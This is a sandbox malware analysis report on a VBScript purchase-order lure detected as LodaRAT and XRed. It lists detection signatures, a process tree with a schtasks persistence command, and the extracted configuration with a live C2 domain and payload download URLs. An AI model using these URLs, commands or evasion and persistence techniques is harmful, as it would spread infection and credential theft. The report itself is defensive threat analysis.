Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Open Purchase Order Summary Sheet.vbs

Overview

General Information

Sample name:Open Purchase Order Summary Sheet.vbs
Analysis ID:1582355
MD5:2bf2f38caab1fe7c657d29984c228b71
SHA1:7a469f97c2e5d0dc1b786d89fc90c11a413275a5
SHA256:44d5e912b8ef69914ba4ba6064dcded455f65e53ae2cfe4addee0f597b51e2c1
Tags:knkbkk212vbsuser-JAMESWT_MHT
Infos:

Detection

LodaRAT, XRed
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected LodaRAT
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Drops PE files to the startup folder
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Potential malicious VBS script found (has network functionality)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected ProcessChecker

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7732 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Open Purchase Order Summary Sheet.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • Google.exe (PID: 7912 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe" MD5: A6BD561711EA8C2064C20644CCEEE074)
      • ._cache_Google.exe (PID: 7960 cmdline: "C:\Users\user\AppData\Local\Temp\._cache_Google.exe" MD5: 3BF7444911198B54B1E8AB53F236683E)
        • cmd.exe (PID: 8104 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 7220 cmdline: schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
        • wscript.exe (PID: 8176 cmdline: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs MD5: FF00E0480075B095948000BDC66E81F0)
      • Synaptics.exe (PID: 8060 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: ACA4D70521DE30563F4F2501D4D686A5)
        • WerFault.exe (PID: 4788 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8060 -s 3184 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • WerFault.exe (PID: 8016 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8060 -s 3360 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 8156 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
  • TCPKPY.exe (PID: 1152 cmdline: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe MD5: 3BF7444911198B54B1E8AB53F236683E)
  • Synaptics.exe (PID: 4152 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: ACA4D70521DE30563F4F2501D4D686A5)
  • TCPKPY.exe (PID: 4352 cmdline: "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe" MD5: 3BF7444911198B54B1E8AB53F236683E)
  • TCPKPY.exe (PID: 4508 cmdline: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe MD5: 3BF7444911198B54B1E8AB53F236683E)
  • Synaptics.exe (PID: 7732 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: ACA4D70521DE30563F4F2501D4D686A5)
    • WerFault.exe (PID: 2756 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7732 -s 9672 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 7224 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
  • TCPKPY.exe (PID: 7156 cmdline: "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe" MD5: 3BF7444911198B54B1E8AB53F236683E)
  • Google.exe (PID: 8112 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe" MD5: A6BD561711EA8C2064C20644CCEEE074)
    • ._cache_Google.exe (PID: 5092 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe" MD5: 3BF7444911198B54B1E8AB53F236683E)
  • TCPKPY.exe (PID: 7920 cmdline: "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe" MD5: 3BF7444911198B54B1E8AB53F236683E)
  • ._cache_Google.exe (PID: 3976 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe" MD5: 3BF7444911198B54B1E8AB53F236683E)
  • TCPKPY.exe (PID: 6200 cmdline: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe MD5: 3BF7444911198B54B1E8AB53F236683E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Loda, LodaRATLoda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.loda

Malware Configuration

Threatname: XRed

{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XRedYara detected XRedJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\UAINOJ.vbsJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
      C:\Users\user\Documents\LSBIHQFDVT\~$cache1JoeSecurity_XRedYara detected XRedJoe Security
        C:\Users\user\Documents\LSBIHQFDVT\~$cache1JoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          C:\ProgramData\Synaptics\RCX4FAD.tmpJoeSecurity_XRedYara detected XRedJoe Security
            C:\ProgramData\Synaptics\RCX4FAD.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              Click to see the 8 entries

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              00000004.00000002.2732607207.0000000004372000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
                00000000.00000003.1489443918.000001C7E5723000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                  0000000B.00000002.2718201933.0000000002A70000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
                    00000000.00000003.1491991054.000001C7E4325000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                      00000000.00000003.1491842358.000001C7E51B0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                        Click to see the 13 entries

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        3.0.Google.exe.400000.0.unpackJoeSecurity_XRedYara detected XRedJoe Security
                          3.0.Google.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Potentially Suspicious Malware Callback Communication
                            Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\._cache_Google.exe, Initiated: true, ProcessId: 7960, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49720
                            Sigma detected: Script Initiated Connection to Non-Local Network
                            Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 23.109.93.100, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7732, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49705
                            Sigma detected: Script Interpreter Execution From Suspicious Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\._cache_Google.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\._cache_Google.exe, ParentProcessId: 7960, ParentProcessName: ._cache_Google.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, ProcessId: 8176, ProcessName: wscript.exe
                            Sigma detected: Suspicious Script Execution From Temp Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\._cache_Google.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\._cache_Google.exe, ParentProcessId: 7960, ParentProcessName: ._cache_Google.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, ProcessId: 8176, ProcessName: wscript.exe
                            Sigma detected: WScript or CScript Dropper
                            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Open Purchase Order Summary Sheet.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Open Purchase Order Summary Sheet.vbs", CommandLine|base64offset|contains: >, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4668, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Open Purchase Order Summary Sheet.vbs", ProcessId: 7732, ProcessName: wscript.exe
                            Sigma detected: CurrentVersion Autorun Keys Modification
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe, ProcessId: 7912, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
                            Sigma detected: Script Initiated Connection
                            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 23.109.93.100, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7732, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49705
                            Sigma detected: Startup Folder File Write
                            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 7732, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe
                            Sigma detected: Suspicious Schtasks From Env Var Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1, CommandLine: schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8104, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1, ProcessId: 7220, ProcessName: schtasks.exe
                            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Open Purchase Order Summary Sheet.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Open Purchase Order Summary Sheet.vbs", CommandLine|base64offset|contains: >, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4668, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Open Purchase Order Summary Sheet.vbs", ProcessId: 7732, ProcessName: wscript.exe
                            Sigma detected: Office Macro File Creation
                            Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 8060, TargetFilename: C:\Users\user\AppData\Local\Temp\1QGQHkIB.xlsm

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-30T11:48:55.785865+010020448871A Network Trojan was detected192.168.2.849715142.250.185.78443TCP
                            2024-12-30T11:48:55.786424+010020448871A Network Trojan was detected192.168.2.849714142.250.185.78443TCP
                            2024-12-30T11:48:57.211247+010020448871A Network Trojan was detected192.168.2.849722142.250.185.78443TCP
                            2024-12-30T11:48:57.221241+010020448871A Network Trojan was detected192.168.2.849721142.250.185.78443TCP
                            2024-12-30T11:48:58.236748+010020448871A Network Trojan was detected192.168.2.849729142.250.185.78443TCP
                            2024-12-30T11:48:58.261093+010020448871A Network Trojan was detected192.168.2.849730142.250.185.78443TCP
                            2024-12-30T11:48:59.261008+010020448871A Network Trojan was detected192.168.2.849734142.250.185.78443TCP
                            2024-12-30T11:48:59.263918+010020448871A Network Trojan was detected192.168.2.849735142.250.185.78443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-30T11:49:58.562265+010028309121Malware Command and Control Activity Detected172.111.138.1005552192.168.2.849879TCP
                            2024-12-30T11:50:36.168810+010028309121Malware Command and Control Activity Detected172.111.138.1005552192.168.2.849879TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-30T11:48:56.102426+010028326171Malware Command and Control Activity Detected192.168.2.84971869.42.215.25280TCP
                            2024-12-30T11:49:15.387383+010028326171Malware Command and Control Activity Detected192.168.2.84975569.42.215.25280TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-30T11:48:31.198826+010028498851Malware Command and Control Activity Detected192.168.2.849753172.111.138.1005552TCP
                            2024-12-30T11:48:31.198826+010028498851Malware Command and Control Activity Detected192.168.2.849879172.111.138.1005552TCP
                            2024-12-30T11:48:31.198826+010028498851Malware Command and Control Activity Detected192.168.2.849796172.111.138.1005552TCP
                            2024-12-30T11:48:31.198826+010028498851Malware Command and Control Activity Detected192.168.2.849747172.111.138.1005552TCP
                            2024-12-30T11:48:31.198826+010028498851Malware Command and Control Activity Detected192.168.2.849720172.111.138.1005552TCP
                            2024-12-30T11:48:31.198826+010028498851Malware Command and Control Activity Detected192.168.2.849837172.111.138.1005552TCP
                            2024-12-30T11:48:55.800485+010028498851Malware Command and Control Activity Detected192.168.2.849720172.111.138.1005552TCP
                            2024-12-30T11:49:04.845921+010028498851Malware Command and Control Activity Detected192.168.2.849747172.111.138.1005552TCP
                            2024-12-30T11:49:13.865993+010028498851Malware Command and Control Activity Detected192.168.2.849753172.111.138.1005552TCP
                            2024-12-30T11:49:22.892519+010028498851Malware Command and Control Activity Detected192.168.2.849796172.111.138.1005552TCP
                            2024-12-30T11:49:31.988356+010028498851Malware Command and Control Activity Detected192.168.2.849837172.111.138.1005552TCP
                            2024-12-30T11:49:41.048759+010028498851Malware Command and Control Activity Detected192.168.2.849879172.111.138.1005552TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus detection for URL or domain
                            Source: http://xred.site50.net/syn/SSLLibrary.dlAvira URL Cloud: Label: malware
                            Antivirus detection for dropped file
                            Source: C:\Users\user\Documents\LSBIHQFDVT\~$cache1Avira: detection malicious, Label: TR/Dldr.Agent.SH
                            Source: C:\Users\user\Documents\LSBIHQFDVT\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                            Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                            Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: HEUR/AGEN.1353217
                            Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                            Source: C:\Users\user\AppData\Local\Temp\UAINOJ.vbsAvira: detection malicious, Label: VBS/Runner.VPJI
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exeAvira: detection malicious, Label: HEUR/AGEN.1353217
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeAvira: detection malicious, Label: HEUR/AGEN.1353217
                            Source: C:\ProgramData\Synaptics\RCX4FAD.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                            Source: C:\ProgramData\Synaptics\RCX4FAD.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                            Source: C:\Users\user\Documents\IPKGELNTQY\~$cache1Avira: detection malicious, Label: TR/Dldr.Agent.SH
                            Source: C:\Users\user\Documents\IPKGELNTQY\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeAvira: detection malicious, Label: HEUR/AGEN.1353217
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeAvira: detection malicious, Label: HEUR/AGEN.1353217
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeAvira: detection malicious, Label: HEUR/AGEN.1353217
                            Found malware configuration
                            Source: 3.0.Google.exe.400000.0.unpackMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
                            Multi AV Scanner detection for dropped file
                            Source: C:\ProgramData\Synaptics\RCX4FAD.tmpReversingLabs: Detection: 91%
                            Source: C:\ProgramData\Synaptics\Synaptics.exeReversingLabs: Detection: 92%
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exeReversingLabs: Detection: 92%
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeReversingLabs: Detection: 60%
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeReversingLabs: Detection: 60%
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeReversingLabs: Detection: 92%
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeReversingLabs: Detection: 60%
                            Source: C:\Users\user\Documents\IPKGELNTQY\~$cache1ReversingLabs: Detection: 91%
                            Source: C:\Users\user\Documents\LSBIHQFDVT\~$cache1ReversingLabs: Detection: 91%
                            Multi AV Scanner detection for submitted file
                            Source: Open Purchase Order Summary Sheet.vbsVirustotal: Detection: 38%Perma Link
                            Source: Open Purchase Order Summary Sheet.vbsReversingLabs: Detection: 26%
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.0% probability
                            Machine Learning detection for dropped file
                            Source: C:\Users\user\Documents\LSBIHQFDVT\~$cache1Joe Sandbox ML: detected
                            Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeJoe Sandbox ML: detected
                            Source: C:\ProgramData\Synaptics\RCX4FAD.tmpJoe Sandbox ML: detected
                            Source: C:\Users\user\Documents\IPKGELNTQY\~$cache1Joe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                            Source: unknownHTTPS traffic detected: 23.109.93.100:443 -> 192.168.2.8:49705 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49714 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49715 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49725 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49724 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49729 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49730 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49744 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49743 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49745 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49752 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49751 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49757 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49758 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49761 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49763 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49765 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49767 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49770 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49774 version: TLS 1.2
